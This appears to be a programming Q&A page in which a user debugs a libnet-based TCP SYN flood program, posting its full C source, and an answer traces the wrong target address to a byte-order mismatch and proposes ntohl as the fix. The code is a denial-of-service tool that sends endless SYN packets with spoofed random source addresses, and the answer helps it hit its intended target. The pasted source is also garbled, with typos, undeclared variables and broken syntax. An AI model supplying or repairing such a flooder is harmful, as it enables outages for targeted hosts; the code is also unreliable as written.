After receiving an answer with about the data you created with libnet, I tried and found that the ip address did not go well (when running with a different ip address and using tcpdump, both ip addresses will be addressed to "76.137.233.137").
What is this address "76.137.233.137"?
Also, as a result of adding the following code:Is the network address "10.0.2.4" acceptable for "402000a"?
sudo./synflood 10.0.2.47890
argv[1]—10.0.2.4
argv[2]: -2005821230
dest_ip —402000a
dest_port —7890
SYN Flooding port 7890 of 10.0.2.4..
synflood.c
#include<string.h>
# include <netinet/in.h>
# include <libnet.h>
# include <arpa/inet.h>
# define FLOOD_DELAY 5000 // Packet injection delay time is 5000 ms.
/* Returns IP in x.x.x.x format */
char*print_ip(uint32_t*ip_addr_ptr){
returninet_ntoa(*(struct in_addr*)ip_addr_ptr));
}
int main(intargc, char*argv[]){
uint32_t dest_ip, source;
uint16_t dest_port;
u_charrbuf [LIBNET_ERRBUF_SIZE], *pcap_errbuf, *packet;
int network, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
libnet_t*l;
if(argc<3){
printf("Usage:\n%s\t\n", argv[0]);
exit(1);
}
// printf("device name:%s\n", alldevsp->name);
l = libnet_init(LIBNET_RAW4, "eth0", errbuf); // Assign memory for packet intoxication
if(l==NULL){
fprintf(stderr, "Error opening context: %s\n", errorbuf);
exit(1);
}
**printf("argv[1]:%s\n", argv[1]);
printf("argv[2]:%d\n", argv[2]);**
dest_ip = libnet_name2addr4(l,argv[1],LIBNET_DONT_RESOLVE); // host
dest_port=(u_short)atoi(argv[2]); // port
**printf("dest_ip:%x\n", dest_ip);
printf("dest_port:%d\n", dest_port);**
if(libnet_seed_prand(l)==-1) // seed the random number generator
printf("Error libnet_seed_prand:%s\n", libnet_geterror(l));
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)));
libnet_ptag_tag_ipv4 = 0;// libnet protocol block
libnet_ptag_ttag_tcp = 0;// libnet protocol block
while(1) {// Permanent loop (until terminated with CTRL-C)
if(tag_tcp=libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (randomized)
dest_port, // destination TCP port
libnet_get_prand (LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // Acknowledgment (ACK) number (randomized)
TH_SYN, // Control Flag (SYN flag only)
libnet_get_prand (LIBNET_PRu16), // Window Size (Random Numbering)
0, // checksum 0 = autofill
0, // Urgent Pointer
LIBNET_TCP_H, // header length
NULL,// payload (none)
0, // payload length
l,//libnet context
0) ==-1)//protocol tag
printf("Error building TCP header; %s\n", libnet_geterror(l));
if(tag_ipv4=libnet_build_ipv4(packet_size, // packet size excluding IP header)
IPTOS_LOWDELAY, // IP tos
libnet_get_brand(LIBNET_PRu16), // IP ID (randomized)
0,// Fragmentation
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // Transport Protocol
0, // checksum 0 = autofill
libnet_get_brand(LIBNET_PRu32), // Source IP (randomized)
dest_ip, // Destination IP (little endian)
NULL,// payload (none)
0, // payload length
l,//libnet context
0) ==-1)//protocol tag
printf("Error building IP header; %s\n", libnet_geterror(l));
if(libnet_write_raw_ipv4(l,packet,40)==-1){
printf("@Errolibnet_write:%s\n", libnet_geterror(l));
exit(1);
}
USLEEP(FLOOD_DELAY); // Wait for FLOOD_DEPLAY milliseconds
}
libnet_destroy(l);// Free up packet memory
return 0;
}
The value returned by the libnet_name2addr4
function (IPv4 address) is "network order" and the IPv4 address requested by the argument of the libnet_build_ipv4
function is "little endian", so the byte order appears to be reversed.
# The debug output should be "a000204".
Therefore, it appears to be sending packets to an unintended IP address.
libnet_name2addr4
function description.(Excerpt from header file) @return
describes "network order."
/**
* Takes a dotted decimal string or a canonical DNS name and returns a
* network byte ordered IPv4 address. This may include DNS lookup if mode is
* set to LIBNET_RESOLVE and host_name references to a canonical DNS name.If mode
* is set to LIBNET_DONT_RESOLVE no DNS lookup will occur. The function can
* fail if DNS lookup fails or if mode is set to LIBNET_DONT_RESOLVE and
* host_name references to a canonical DNS name.
* @param l pointer to a libnet context
* @param host_name pointer to a string containing a presentation format host
* name
* @param use_name LIBNET_RESOLVE or LIBNET_DONT_RESOLVE
* @return address in network byte order
* @retval-1(2^32-1)on error
*/
LIBNET_API
uint32_t
libnet_name2addr4(libnet_t*l, const char*host_name, uint8_tuse_name);
libnet_build_ipv4
function description.(Excerpt from header file) @param dst
says little endian
/**
* Builds a version 4 RFC 791 Internet Protocol (IP) header.
*
* @param ip_len total length of the IP packet including all subsequence data (subsequence)
* data include any IP options and IP options padding)
* @param tos type of service bits
* @paramid IP identification number
* @param fragmentation bits and offset
* @param ttl time to live in the network
* @param protector layer protocol
* @param sum checksum (0 for libnet to auto-fill)
* @param src source IPv4 address (little endian)
* @param dst destination IPv4 address (little endian)
* @param payload optional payload or NULL
* @param payload_spayload length or 0
* @param l pointer to a libnet context
* @param ptag protocol tag to modify an existing header, 0 to build a new one
* @return protocol tag value on success
* @retval-1 on error
*/
LIBNET_API
libnet_ptag_t
libnet_build_ipv4(uint16_tip_len, uint8_tos, uint16_tid, uint16_tfrag,
uint8_ttl, uint8_t plot, uint16_tsum, uint32_t src, uint32_tdst,
constuint8_t*payload, uint32_tpayload_s, libnet_t*l, libnet_ptag_ttag);
*
Therefore, I think you can convert the return value of the libnet_name2addr4
function to "little endian".
I think there are many ways to convert it, but I think the typical one is ntohl
.
/*Usage Examples*/
dst = ntohl(dst);
# Since it is a Kali Linux environment, we assume that the host order is Little endian.
© 2024 OneMinuteCode. All rights reserved.